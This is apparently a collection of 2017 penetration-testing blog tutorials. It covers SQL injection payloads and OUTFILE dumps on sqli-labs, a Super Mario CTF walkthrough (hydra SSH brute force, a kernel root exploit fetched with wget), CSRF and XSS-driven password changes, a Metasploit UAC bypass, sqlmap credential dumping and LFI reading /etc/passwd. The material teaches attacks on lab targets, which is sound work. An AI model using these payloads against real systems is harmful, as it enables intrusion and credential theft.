At last execute following query to read all username inside the table users from inside its column.

From screenshot you can read the fetched data.

http://localhost:81/sqli/Less-27/?id=0'%a0UnIon%a0SeLect%a01,group_concat(username),3%a0from%a0users%a0where%a01%26%26%a0'1

Hence in lesson 27 we have learned how to bypass UNION/union, SELECT/select, SPACE and COMMENT filter for retrieving information inside the database.

---

Hack the Super Mario (CTF Challenge)

June 7, 2017, 8:22 am

≫ Next: Bypass Admin access through guest Account in windows 10

≪ Previous: How to Bypass Filter in SQL Injection Manually

$

0

0

Hello friends!! Might you people have played THE SUPER MARIO game once in your childhood and no wonder if a thought have been strike in your mind to hack the game. So whatever you had thought today we are going to make it true and for that you guys need to download the new VM machine for super Mario from here.

The credit for developing this VM machine is goes to Mr_h4sh who has hide 2 flag inside this lab as a challenge for hackers. The level of the challenge is Intermediate.

Let’s breach!!!

As you know we always start with enumeration, therefore open the terminal in your kali Linux and go for aggressive scan with nmap.

Nmap –p- -A 192.168.0.5

Since port 22 and port 8180 for service SSH and HTTP respectively therefore I choose port 8081 for enumeration but from screenshot you can see I didn’t get any remarkable result.

Dirb http://192.168.0.5:8180

Then I move for directory brute force attack using following command

Dirb http://192.168.0.5:8180 /usr/share/wordlists/dirb/big.txt

In the given below screenshot you can read it has shown a file name vhosts, let’s explore it through browser.

Now explore vhost in URL as  http://192.168.0.5:8180/vhostshere vhosts stand for virtual host it is method for hosting multiple domain on a single server. From inside Vhosts I came know the Server Name is mario.supermariohost.local 

Let’s addmario.supermariohost.local into /etc as new localhost

Cd etc

Vim hosts

Now type “192.168.0.5 mario.supermariohost.local”inside the vim editor to add it in the /etc/host and after then type wq to save it.

Now Type Cat hoststo check added host name Hence you from screenshot you can see it has been had added inside it successfully.

Then I visit mario.supermariohost.localon browser and finally got Mario as browser game but it is not working.

Since we know port 22 and 8081 was open and we didn’t get much information from enumeration of port 8081. Now we will move towards port 22 for SSH enumeration therefore I had prepared a dictionary in order to retrieve credential to login inside SSH server. 

Dictionary contains username which was the famous character of MARIO, you can check these name from Google also.

Inside text editor type following name: Mario; luigi; peach; toad; yoshi and save file as user on desktop.

Use john the ripper to generate dictionary of password using following command here –rules will enable the wordlist and --stdoutwill define a fix length of password to be generate on the desktop as pass.

John –wordlist : user –rules –stdout > pass

Finally we have username dictionary as userand password dictionary generated by john as pass, now we have to match perfect combination of user and pass in order to retrieve credential for SSH login. I had chosen hydra for password cracking, you can choose any other password cracking tool also.

Hydra –L user –P pass 192.168.0.5 ssh

From the given screenshot you read the matched combination of username: luigi and password: luigi1 for SSH server.

Now type following for SSH login

Ssh luigi@192.168.0.5

Password luigi1

Yeeppiii!!!!  Finally we have login inside SSH server.

Uname –a

Here we come to know that the version for linux  supermariohost 3.13.0; let’s checkout its exploit on Google.

Yes, there is an exploit for 3.13.0 overlayfs local root in ubuntu , download it from hereinside your kali Linux.

Form screenshot you can see I have downloaded the exploit as Mario.c for privilege escalation. 

Now type following command for downloading Mario.c inside target system.

Wget http://192.168.0.6/mario.c

The file is successfully downloaded inside it now type another command to compile Mario.c

Gcc Mario.c –o mario

./Mario

Id

Cd/root

Ls

Awesome!!! We have got root privilege and from screenshot you can see inside its directory I have got zip file as flag.zip

Now type following command to download flag.zip on the desktop of your kali Linux

Scp /root/flag.ziproot@192.168.0.6:/root/Desktop

Fcrackzip flag.zip –D –P /user/share/wordlist/rockyou.txt -u
As shown in given screenshot PASSWORD FOUND!!! : pw ==ilovepeach; now you can unzip your file using this password.

Unzip flag.zip

It will ask for password, give above password to unzip it and again if you notice the given image it contains flag.txt

Cat flag.txt

1^stFLAG: Well done: D If you reached this it means you got root, congratulations.

Now follow the given below step in order to complete another challenge.

Iptables –L

Here from screenshot you can see a new network has been added on remote system.

Arp–n

Now the target system has been forwarded on a new IP 192.168.122.112

Ls -la

Found a directory .bak

Cd /.bak

Ls

Cd users

Cd luigi

Ls

There are two files inside it let’s read them one by one

Cat message

Hi Luigi,

Since you've been messing around with my host, at this point I want to return the favour.

This is a "war", you "naughty" boy!

Cat id_rsa.pub

The highlighted word in the given text may appear like a username for login into SSH server.

Let ensure by login into ssh -i id_rsa warluigi@192.168.1.122.112

Great!! All assumption had given positive result

Again check for kernel version

Uname -a

Woooww!! It is same version now we can use our Mario.c exploit for root privilege. Hence repeat the above step as shown in images.

Wget http://192.168.0.6/maio.c

The file is successfully downloaded inside it now type another command to compile Mario.c

Gcc Mario.c –o Mario

./Mario

Id

Cd /root

Ls –la

Here I found two important files 1^sthint.txt 2^ndflag2.zip before going for unzip flag.zip we must look towards hint.txt file.

Cat .hint.txt

“Peach Loves Me” it might be the password key for decrypting the flag2.zip file 

Now let download fla2g.zip on the desktop of kali Linux by using following again

Scp /root/flag2.ziproot@192.168.0.6:/root/Desktop

Unzip flag2.zip

Now when it will ask for password key type “Peach Loves Me”

It contains flag2.txt inside type cat flag2.txt to open this file.

2^ndFLAG: Congratulations on your second flag!

  

Wonderful!!! We have caught both flags

Bypass Admin access through guest Account in windows 10

June 7, 2017, 10:33 pm

≫ Next: Form Based SQL Injection Manually

≪ Previous: Hack the Super Mario (CTF Challenge)

$

0

0

Open command prompt and check windows user account status using “whoami” command.

Account name is “joe” and account status is ‘DefaultAccount’ which is a non-administrator account type.

Try changing administrator using the ’net user’ command. You will see an error ‘Access is denied’

Now download “CVE-2017-0213_x64” from hereand unzip in your PC. Go to the folder and you can find the .exe file, double click on it to run it.

The moment you double click on it, it will automatically open a new command prompt with administrator privileges.

Use ‘net user’ command to change the administrator account password. Message ‘The command completed successfully’ will appear. You have now successfully changed the administrator accounts password.

Form Based SQL Injection Manually

June 9, 2017, 9:32 am

≫ Next: Understanding the CSRF Vulnerability (A Beginner Guide)

≪ Previous: Bypass Admin access through guest Account in windows 10

$

0

0

In our previous article we had perform Form Based SQL injection using sqlmap but today we are going to perform Form Based SQL injection  in DHAKKAN manually. There are so many example related to login form like: Facebook login; Gmail login; other online accounts which may ask you to submit your information as username and password.

Let’s start!! 

LESSON 11

This lesson is much similar to lesson 1,2,3,4 if you not familiar to these lessons then please go through it from here. You will come to know how to perform SQL Injection manually step by step in order to retrieve the data from inside the database system.

Lesson 11 is regarding POST error based single quotes (‘)string so when you will explore this lab on the browser you will observe that it contains text field for username and password to login inside web server. As we are not true user so we don’t know the correct username and password but being hacker we always wish to get inside the database with help of SQL injection. Therefore first we will test whether the database is vulnerable to SQL injection or not.

Since lesson itself sound as error based single quotes (‘) string, thus I had used single quotes (‘) to break the query inside the text field of username then click on submit.

Username:      ’

From the given screenshot you can see we have got error message (in blue color) which means the database is vulnerable to SQL injection. 

So we when break the query we get error message, now let me explain what this error message says.

The right syntax to use near '''' and password=''LIMIT 0,1’

Now we need to fix this query with help of # (hash) comment; so after adding single quotes (‘) add a hash function (#) to make it syntactically correct.

Username:  '   #

From screenshot you can see it has shown login attempted failed though we have successfully fixed the blue color error message.

Now whatever statement you will insert in between ‘and # the query will execute successfully with certain result according it. Now to find out number of columns used in the backend query we’ll use order by clause

Username:  ' order by 1 #

Username:  ' order by 2 #

Username:  ' order by 3 #

From screenshot you can see I received error at order by 3 which mean there are only two columns used in the backend query

Similarly insert query for union select in between ‘and # to select both records.

Username:  ' union select 1,2 #

From screenshot you can see it also shown successfully logged in, now retrieve data from inside it.

Next query will fetch database name, it is as similar as in lesson 1 and from screenshot you can read the database name “security”

Username:  ' union select 1,database() #

Through given below query we will be able to fetch tables name present inside database.

Username:  ' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we’ll try to find out column names ofusers table using following query

Username:  ' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #

Their so many columns but we interested in username and password only.

At last execute following query to read all username and password inside the table users.

Username:  ' union select group_concat(username),group_concat(password) from users   #

Hence you can see we have not only retrieve single user credential but entire users credential now use them for login.

This is all about single quotes string error based injection in lesson 11.

Lesson 12

In some scenario you will try to use single quotes string for test SQL vulnerability or will go extend in order to break the query even after knowing that database is vulnerable but you will be not able to get break the query and receive error message because might the developer had blacklist the single quotes (‘) at the backend query.

Lesson 12 is similar to previous lesson 11 but here you will face failure if you used single quotes for breaking the query, since the chapter sound closed to post Error based double quotes string (“). Thus I had used double quotes (“) to break the query inside the text field of username then click on submit.

username:  "

From the given screenshot you can see we have got error message (in blue color) which means the database is vulnerable to SQL injection. 

So we when break the query we get error message, now let me explain what this error message says.

The right syntax to use near '""") and password=("") LIMIT 0,1'

Now we need to fix this query with help of ) closing parenthesis and # (hash) comments; so after double quotes (“) add ) closing parenthesis  hash function (#) to make it syntactically correct.

username:  ")   #

From screenshot you can see it has shown login attempted failed though we have successfully fixed the blue color error message.

Now whatever statement you will insert in between ‘) and # the query will execute successfully with certain result according it. Now to find out number of columns used in the backend query we’ll use order by clause

username:  ") order by 3 #

From screenshot you can see I received error at order by 3 which means there are only two columns used in the backend query

Similarly insert query for union select in between ‘)and # to select both records.

Username:  ") union select 1,2 #

From screenshot you can see it also shown successfully logged in, let’s now retrieve data from inside it.

Next query will fetch database name, it is as similar as in lesson 1 and from screenshot you can read the database name “security”

Username:  ") union select 1,database() #

Through given below query we will be able to fetch tables name present inside database.

Username:  ") union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we’ll try to find out column names ofusers table using following query

Username:  ") union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #

Their so many columns but we interested in username and password only.

At last execute following query to read all username and password inside the table users.

Username:  ") union select group_concat(username),group_concat(password) from users   #

Hence you can see we have not only retrieve single user credential but entire users credential now use them for login.

This is all about double quotes string error based injection in lesson 12.

Understanding the CSRF Vulnerability (A Beginner Guide)

June 11, 2017, 10:14 am

≫ Next: Bypass UAC Protection of Remote Windows 10 PC (Via FodHelper Registry Key)

≪ Previous: Form Based SQL Injection Manually

$

0

0

Today we will see CSRF attack in different scenario like transferring fund and password changing but before we see how cross site request forgery works we need to understand of few concepts.

Tabbed browsing: Tabbed browsing is an attribute of the Web browserswhich allow the users to view multiple web sites on a single window instead of opening new browser window. These extra web pages are represented by tabs at the top of the browser window.

Imagine that you are logged into the Facebook server and visit a malicious website in the same browser, although on different tab. In absence of the same origin policy (SOP), an attacker can go through your profile and other sensitive information with the help of JavaScript. For example read private messages, send fake message, read your chats.

SOP: The same-origin policy is an important concept in the web application security model. Under the policy, a web browser permits scripts contained in a first web page to access data in a second web page, but only if both web pages have the same origin.

XHR: XML Http Request is an API in the form of an object whose methods transfer data between a web browser and a web server. 

§  Update a web page without reloading the page

§  Request data from a server - after the page has loaded

§  Receive data from a server  - after the page has loaded

§  Send data to a server - in the background

§   

CSRF: Cross-site request forgery also known as single-click attack or session traversing, in which a malicious website will throw a request to a web application that the user is already authenticated against from a different website. This way an attacker can access functionality in a targeted web application via the victim’s already authenticated browser.

If the victim is an ordinary user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the targeted end user is the administrator account, this can compromise the entire web application.

In this article we will test a web application against csrf vulnerability with the help of burp suit Poc.

Source https://www.w3schools.com/xml/xml_http.asp

https://en.wikipedia.org/wiki/Same-origin_policy

Let’s start!!

For this tutorial I had used bWAPP the vulnerable web application and create a new user raazwith password 123 for login inside the web server.

Now set the security level low then from list of given vulnerability choose your bug cross site request forgery (change secret) and click on hack.

If you have noticed the first image for creating a new user in that the user “raaz” has set his secret value as 123 now if the user raaz wish to change the secret value for his password he can change it from here.

Now let’s check out how we can test this functionality against CSRF attack and force raaz to change his secret value from the attacker’s desired value that is set a new secret value without his (user) knowledge.

Start the burp suite to capture the sent request between the browser and web application.

Form given screenshot you can see we have successfully captured the request inside burp suite now here once you have received intercepted data then go towards ACTION tab select engagement tools and at last choose Generate CSRF PoC.

CSRF PoC generator will automatically generates an HTML form page which you can see in given below screenshot, Click on copy HTML tag and open a text document to past the copied data.

Once you have paste the html code now add your (attacker) secret value “1234” moreover you need to add user name “raaz” for whom the secret value will get changed, now save the text document as csrf1.html and then use social engineering technique for sharing csrf1.html file to the targeted user.

When victim will open Csrf1.html file, here he will found a submit button now as he will click on submit button the secret value for target location will get changed without his (victim) knowledge.

Here you observe the result form given below screenshot. Hence in this way CSRF attack change the old secret value for password set by user “raaz”.

In next scenario we are going to test CSRF attack while transfer amount from users account. You might be well aware from such scenario when phone operator let say Airtel transfer an amount (Rs 500) in order to recharge customer phone and user receive the message of transaction and other example is related  bank amount transfer from one user’s account to another user’s account.

In order to learn csrf attack in this situation again login in bWAPP then choose your next 

vulnerability cross site request forgery (transfer Amount) and click on hack. 

In the given screenshot you can see user have only 1000 EUR in his account it means above this amount the transaction  is not possible for both (user as well as for attacker). Further it is showing user’s account number to transfer and amount to be transfer.

The procedure for csrf attack is similar as above use burp suite to capture the sent request of browser.

Form given screenshot you can see we have successfully captured the request inside burp suite now here once you have received intercepted data then go towards ACTION tab select engagement tools and at last choose Generate CSRF PoC.

Again it will create html form automatically for intercepted data now click on copy html tag given at below to copy the generate html code for form.

Open a text document to past the copied data, Once you have paste the html code now add your (attacker) amount “100” to be transfer, now save the text document as csrf2.htmland then use social engineering technique for sharing csrf2.html file to the targeted user.

When victim will open Csrf2.html file, here he will found a submit button now as he will click on submit button given amount will be transfer without his (victim) knowledge.

From given screenshot result you see now the amount is left 900 EUR in user’s account which means 100 EUR has been deducted from his account. Hence again we saw effect of CSRF attack while amount transaction from once account to another.

At last we are going to learn the most impactful CRSF attack for changing the password of user account without his knowledge. Again we will login into bwapp and choose the bug “cross site request forgery (change password)” to test the csrf vulnerability.

Here you can clearly saw two text field, one for new password another for confirm password again we will repeat the process using burp suite to catch the request of browser.

Form given screenshot you can see we have successfully captured the request inside burp suite now here once you have received intercepted data then go towards ACTION tab select engagement tools and at last choose Generate CSRF PoC.

Once again it has generated the html code for changing the password, hence you can see burp suite itself generate related html form for destination website, and this is an advantage which save attacker’s time for generating CSRF html form. Again click on copy html tab to copy the code.

Open a text document to past the copied data, Once you have paste the html code now add your (attacker)new password value and confirm password value, now save the text document as csrf3.html and then use social engineering technique for sharing csrf3.html file to the targeted user.

If you remember the old password was “123” for user “raaz” and from screenshot you can perceive that now new password is raj.

When victim will open Csrf3.html file, here he will found a submit button now as he will clickon submit button the password will reset for his account without his (victim) knowledge.

Hence you can verified it through given below image where it has clearly gave the message that “password has been changed”

So today you have seen how we had made csrf attack on web application server in different scenario with help of burp suite Poc.

Try it yourself!!

Bypass UAC Protection of Remote Windows 10 PC (Via FodHelper Registry Key)

June 15, 2017, 9:51 am

≫ Next: CSRF Exploitation using XSS

≪ Previous: Understanding the CSRF Vulnerability (A Beginner Guide)

$

0

0

Hello friends! Today we are going to share new article related to how to bypass window 10 UAC once you have hacked the victim’s system. In metasploit a new module has been added to achieve admin access in window 10s.

Attacker: kali Linux

Target: window 10

This module will bypass Windows 10 UAC by hijacking a special key in the Registry under the current user hive, and inserting a custom command that will get invoked when the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC flag turned off. This module modifies a registry key, but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.

Use exploit/windows/local/bypassuac_fodhelper

msf exploit(bypassuac_fodhelper) >set session 1

msf exploit(bypassuac_fodhelper) >exploit

Hence you can see another meterpreter session 2 opened which means we successfully exploited the target once again now let’s check user privilege.

Meterpreter > get system

Awesome!!!! We got admin privilege successfully.

CSRF Exploitation using XSS

June 24, 2017, 4:08 am

≫ Next: Dumping Database using Outfile

≪ Previous: Bypass UAC Protection of Remote Windows 10 PC (Via FodHelper Registry Key)

$

0

0

Hello friends! In our previous article we saw how an attacker can shoot web application against CSRF vulnerability with help of burp suite. Today again we are going to test CSRF attack with help of XSS vulnerability.AS we know taking the help of XSS attacker might be able to reads cookies from the same domain and if CSRF token are stored in cookies then attacker will able to read the CSRF token from CSRF protected post.

Let’s have a look how an attacker can make CSRF attack for changing password of admin account when the web application is suffering from cross site scripting vulnerability. For this tutorial I had used DVWA and set its security level low.

Suppose that you have found XSS vulnerability in any web application server. Here we are going to use java script or HTML script which will make CSRF attack for changing the password of admin account.

An XSS attack can be used to read the cookies and get the valid tokens if it is stored in cookies which have to be inserted in the malicious script to make CSRF possible. Using image tag we will send a malicious script, inside script I had set new password as 123456.

Now let’s check whether the password for admin has been changed or not, previously credential was admin: password, if admin get failed to login inside web server using his previous credential then we had successfully made CSRF attack.

From given screenshot you can see using admin: password it confirms login failed. Now use your new password 123456 for login inside web server.

Similarly there is another web application bwappwhere we will demonstrate same attack using XSS vulnerability. First you need to chose your bug “cross site scripting Reflected (post)” and set security level low.

In given screenshot the form is suffering from XSS vulnerability now we are going to generate a script for making CSRF possible in order to change password for a user. Here we are login as bee: buginto web server now we will try to change its password with help of cross site scripting.

Similarly using image tag we will send a malicious script, inside script I had set new password as hack.

From screenshot you can see generated image icon which means this form has XSS flaws now let check whether the password has been modified or not for user bee.

Now use previous credential bee: bug if login failed is confirmed it means we have successfully shoot the CSRF attack and from screenshot you can see “invalid credential or user not activated” message.  Now use new password for login into web server.

Conclusion: XSS vulnerabilities exist anywhere in same domain it could lead to CSRF attack and allows attackers to remotely control the target’s browser with full rights, making CSRF useless.

Dumping Database using Outfile

June 26, 2017, 8:55 am

≫ Next: How to Spider Web Applications using Burpsuite

≪ Previous: CSRF Exploitation using XSS

$

0

0

In our previous article you have learned the basic concepts of SQL injection but in some scenarios you will find that your basic knowledge and tricks will fail. Today we are going to perform SELECT...INTO OUTFILE statement is easiest way of exporting a table records into a text file or excel file

This statement allows user to load table information very rapidly to a text file on the server machine. SELECT ... INTO OUTFILE writes the significant rows to a file, and gives authority to the use of column and row terminators to specify output format. The output file is created directly by the MySQL server, so the filename with path should be specify where user want the file to be written on the server host. The file must not exist already on server. It cannot be overwritten. A user requires the FILE privilege to run this statement.

Let’s start!!

Lesson 7

Open the browser and type following SQL query in URL

http://localhost:81/sqli/Less-7/?id=1

From screenshot you can read “you are in….. Use outfile” now let’s try to break this statement.

OKAY! The Query has been broken successfully we receive the error message when we had used single quote (‘) in order to break query hence it confirms that it is vulnerable.

http://localhost:81/sqli/Less-7/?id=1’

After making lots of efforts finally successfully the query gets fixed, if noticed the step for SQL injection is similar as previous chapter only techniques to fix the query is different.

http://localhost:81/sqli/Less-7/?id=1’))    --+

Now following query will dump the result into a text file. Here you need to mention the path where user wants the file to be written on the server host. The file must not exist already on server user always use new text file for over writing database information.

http://localhost:81/sqli/Less-7/?id=1')) union select 1,2,3 into outfile "/xampp/htdocs/sqli/Less-7/hack1.txt" --+

From screenshot you can perceive that still it is showing error message now open another tab for the output of resultant query.

http://localhost:81/sqli/Less-7/

Now add file name hack1.txt to check output of above query.

http://localhost:81/sqli/Less-7/hack1.txt

hence you can see we get output of executed query inside text file. This will save hack1.txt file inside the server machine also.

Execute following query to retrieve database name using union injection using a new text file.

http://localhost:81/sqli/Less-7/?id=1')) union select 1,2,database() into outfile "/xampp/htdocs/sqli/Less-7/hack2.txt" --+

http://localhost:81/sqli/Less-7/hack2.txt

Hence you can see we have successfully get security as database name as result.

Next query will provide entire table names saved inside the database using another text file.

http://localhost:81/sqli/Less-7/?id=1')) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() into outfile "/xampp/htdocs/sqli/Less-7/hack3.txt" --+

http://localhost:81/sqli/Less-7/hack3.txt

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we’ll try to find out column names of users table using following query.

localhost:81/sqli/Less-7/?id=1')) union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' into outfile "/xampp/htdocs/sqli/Less-7/hack4.txt" --+

http://localhost:81/sqli/Less-7/hack4.txt

Hence you can see it contains so many columns inside it I had chosen only two columns for further enumeration.

C1: username

C2: password

At last execute following query to read all username and password inside the table users from inside its column.

http://localhost:81/sqli/Less-7/?id=1')) union select 1,group_concat(username),group_concat(password)from users into outfile "/xampp/htdocs/sqli/Less-7/hack5.txt" --+

http://localhost:81/sqli/Less-7/hack5.txt

From screenshot you can read the username and password save inside text file.

Note: you can try same attack using excel file; attacker only need to change hack1.txt into hack1.csv which will save the output into excel file.

---

How to Spider Web Applications using Burpsuite

June 28, 2017, 1:41 am

≫ Next: Database Penetration Testing using Sqlmap (Part 1)

≪ Previous: Dumping Database using Outfile

$

0

0

Hello friends! Today we are doing web penetration testing using burp suite spider which very rapidly crawl entire web application and dump the formation of targeted web site.

Burp Spider is a tool for automatically crawling web applications. While it is generally preferable to map applications manually, you can use Burp Spider to partially automate this process for very large applications, or when you are short of time.

Source: https://portswigger.net/burp/help/spider.html

Let’s begin!!

First attacker needs to configure browser and burp proxy to work properly, www.tetphp.vulnweb.com will my targetd web site for enumeration.

Form given below screenshot you can see currently there is no targeted website inside site map of burp suite. To add your targeted web site inside it you need to fetch the http request send by browser to web application server, using intercept option of proxy tab.

Click on proxy tab and turn on intercept in order to catch http request.

Here you can observe that I had fetched the http request of www.tetphp.vulnweb.com; now send to spider with help of action tab.

Confirm your action by making click on YES; Burp will alter the existing target scope to include the preferred item, and all sub-items contained by the site map tree.

Now choose spider tabfor further step, here you will find two sub categories control tab and option.

Burp Spider - Control Tab

This tab is used to start and stop Burp Spider, monitor its progress, and define the spidering scope.

Spider Status

Use these settings to monitor and control Burp Spider:

·         Spider is paused / running - This toggle button is used to start and stop the Spider. While the Spider is stopped it will not make any requests of its own, although it will continue to process responses generated via Burp Proxy (if passive spidering is enabled), and any newly-discovered items that are within the spidering scope will be queued to be requested if the Spider is restarted.

·         Clear queues - If you want to reprioritize your work, you can completely clear the currently queued items, so that other items can be added to the queue. Note that the cleared items may be re-queued if they remain in-scope and the Spider's parser encounters new links to the items.

Spider Scope

This panel lets you define exactly what is in the scope for the Spider to request.

The best way to handle spidering scope is normally using the suite-wide target scope, and by default the Spider will use that scope.

Burp Spider Options

This tab contains options for the basic crawler settings, passive spidering, form submission , application login, the Spider engine, and HTTP request headers .

You can monitor the status of the Spider when running, via the Control tab. Any newly discovered content will be added to the Target site map.

When spidering a selected branch of the site map, Burp will carry out the following actions (depending on your settings):

·         Request any unrequested URLs already present within the branch.

·         Submit any discovered forms whose action URLs lay within the branch.

·         Re-request any items in the branch that previously returned 304 status codes, to retrieve fresh (uncached) copies of the application's responses.

·         Parse all content retrieved to identify new URLs and forms.

·         Recursively repeat these steps as new content is discovered.

·         Continue spidering all in-scope areas until no new content is discovered.

Hence you can see the targeted website has been added inside the site map as a new scope for web crawling. Choose spider this host option by making right click on selected URL which automatically start web crawling.

When you click on preferred target site map further content which has been discover by spider will get added inside it as shown in given image below.

Form screenshot you can see its dump all items of web site even by throwing request and response of host.

Database Penetration Testing using Sqlmap (Part 1)

June 29, 2017, 12:18 am

≫ Next: Beginner Guide to File Inclusion Attack (LFI/RFI)

≪ Previous: How to Spider Web Applications using Burpsuite

$

0

0

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features

·         Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix database management systems.

·         Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.

·         Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.

·         Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.

·         Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.

·         Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.

·         Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.

·         Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.

·         Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.

·         Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.

·         Support for database process' user privilege escalation via Metasploit'sMeterpretergetsystem command.

These options can be used to enumerate the back-end database management system information, structure and data contained in the tables.

Sometimes you visit such websites that let you to select product item through their picture gallery if you observer its URL you will notice that product item is call through its product-ID numbers.

Let’s take an example

http://testphp.vulnweb.com/artists.php?artist=1

So when attacker visits such kind of website he always checks for SQL vulnerability inside web server for lunching SQL attack.

 Let’s check how attacker verifies SQL vulnerability.

Attacker will try to break the query in order to order to get error message, if he successfully received error message then it confirms that web server is SQL injection affected.

http://testphp.vulnweb.com/artists.php?artist=1’

From screenshot you can see we have received error message successfully now we have make SQL attack on web server so that we can fetch database information.

Databases

For database penetration testing we always choose SQLMAP, this tool is very helpful for beginners who are unable to retrieve database information manually or unaware from SQL injection techniques.

Open the terminal in your Kali Linux and type following command which start SQL injection attack on the targeted website.  

Sqlmap –u “http://testphp.vulnweb.com/artists.php?artist=1” –dbs –batch

-u:  target URL

--dbs: fetch database name

--batch: This will leave sqlmap to go with default behavior whenever user's input would be required

Here from given screenshot you can see we have successfully retrieve database name “acuart”

Tables

As we know a database is a set of record which consist of multiple table inside it therefore now use another command in order to fetch entire table names from inside the database system.

Sqlmap –u “http://testphp.vulnweb.com/artists.php?artist=1” –D acuart –table –batch

-D: DBMS database to enumerate (fetched database name)

--tables: enumerate DBMS database table

As a result given in screenshot we have enumerated entire table name of database system. There are 8 tables inside database “acuart” as following:

T1: artists

T2: carts

T3: categ

T4: featured

T5: guestbook

T6: pictures

T7: products

T8: users

Columns

Now further we will try to enumerate column name of desired table. Since we know there is a users table inside the database acuart and we want to know the all column names of users table therefore we will generate another command for column captions enumeration.

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns –batch

-T: DBMS table to enumerate (fetched table name)

--columns: enumerate DBMS database columns

Get data from a table

Slowly and gradually we have penetrated much details of database but last and most important step is to retrieve information from inside the columns of a table. Hence at last we will generate a command which will dump information of users table.

 sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --dump –batch

--dump: dump all information of DBMS database

Here from given screenshot you can see it has dump entire information of table users, mainly users table contains login credential of other users. You can use these credential for login into server on behalf other users.

Dump All

Last command is the most powerful command in sqlmap which will save your time in database penetration testing; this command will perform all the above functions at once and dump entire database information including table names, column and etc.

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart –dump-all –batch

This will give you all information at once which contains database name as well as table’s records.

Try it yourself!!!

Beginner Guide to File Inclusion Attack (LFI/RFI)

June 29, 2017, 1:01 am

≫ Next: Beginners Guide to Cross Site Scripting (XSS)

≪ Previous: Database Penetration Testing using Sqlmap (Part 1)

$

0

0

You can insert the content of one PHP file into another PHP file before the server executes it, with the include () function. The function can be used to create functions, headers, footers or element that will be reused on multiple pages.

This will help developers to make it easy to change the layout of complete website with minimal effort.

If there is any change required then instead of changing thousands of files just change included file.

Assume we have a standard footer file called "footer.php", that looks like this

echo "Copyright © 2010-" . date("Y") . " hackingartices.in
";

?>

To include the footer file in a page, use the include statement

Welcome to Hacking Articles

Some text.

Some more text.

Example 2

Assume we have a file called "vars.php", with some variables defined:

$color='red';

$car='BMW';

?>

Welcome to my home page!

echo "I have a $color $car.";

?>

Output: I have red BMW

PHP Require Function

The requirestatement is also used to include a file into the PHP code.

However, there is one big difference between include and require; when a file is included with the include statement and PHP cannot find it, the script will continue to execute:

Example 3

Welcome to my home page!

 include 'noFileExists.php';
echo "I have a $color $car.";
?>

Output: I have a

If we do the same example using the require statement, the echo statement will not be executed because the script execution dies after the require statement returned a fatal error:

Welcome to my home page!

 require 'noFileExists.php';
echo "I have a $color $car.";
?>

No output result

PHP Required_once Function

Require_once() using this function we can access the data of another page once when you may need to include the called file more than once, It works the same way. The only difference between require and require_once is that If it is found that the file has already been included, calling script is going to ignore further inclusions.

Example 4

echo.php

echo "Hello";
?>

test.php

require('echo.php');
require_once('echo.php');
?>

outputs: "Hello"

Note

allow_url_include is disabled by default. If allow_url_fopen is disabled, allow_url_include is also disabled

You can enable allow_url_include from php.ini

/etc/php7/apache2/php.ini

allow_url_include = On

File Inclusion Attacks

It is an attack that allows an attacker to include a file on the web server through a php script. This vulnerability arises when a web application lets the client to submit input into files or upload files to the server.

This can lead following attacks:

·         Code execution on the web server

·         Cross Site Scripting Attacks (XSS)

·         Denial of service (DOS)

·         Data Manipulation Attacks

Two Types:

Local File Inclusion

Remote File Inclusion

Local File Inclusion (LFI)

Local file inclusion vulnerability occur when a file to which to PHP account has accessed is passed as a parameter to the PHP function “include”, or “require_once”

This vulnerability occurs, for example, when a page receives, as inputs the path to the file that has to be included  and this input is not properly sanitized, allowing directory traversal characters (such as dot-dot-slash) to be injected.

Example – Local File Inclusion

http://192.168.1.8/dvwa/vulnerabilities/fi/?page=file1.php

http://192.168.1.8/dvwa/vulnerabilities/fi/?page=/etc/passwd

Read complete local file inclusion attack tutorial fromhere

Remote File Inclusion (RFI)

Remote File Inclusion occurs when the URI of a file located on a different server is passed to as a parameter to the PHP function “include”, “include_once” , “require” , or “require_once” . PHP incorporates the content into the pages. If the content happens to be PHP source code, PHP executes the file.

PHP Remote File inclusion allows and attacker to embed his/her own PHP code inside  a vulnerable  PHP script , which may lead to disastrous results such as allowing the attacker to execute remote commands on the web server, deface parts of the web or even steal confidential information.

http://192.168.1.8/dvwa/vulnerabilities/fi/?page=file1.php

